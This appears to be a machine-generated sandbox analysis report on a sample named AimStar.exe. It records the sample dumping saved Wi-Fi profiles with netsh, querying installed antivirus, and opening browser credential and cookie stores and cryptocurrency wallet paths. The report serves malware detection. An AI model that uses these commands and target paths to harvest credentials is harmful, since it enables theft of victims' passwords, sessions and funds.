              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F4D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF710F4D080
              Source: C:\Users\user\Desktop\AimStar.exeCode function: 0_2_00007FF710F65C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF710F65C70
              Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exeCode function: 88_2_00007FF7139948CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,88_2_00007FF7139948CC
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000003.2021999995.00000192BB8F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2021999995.00000192BB8F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AimStar.exe PID: 7284, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI72842\rarreg.key, type: DROPPED
              Source: Yara matchFile source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Electrum
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.wallet
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Ethereum
              Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\AimStar.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486Jump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.defaultJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-releaseJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
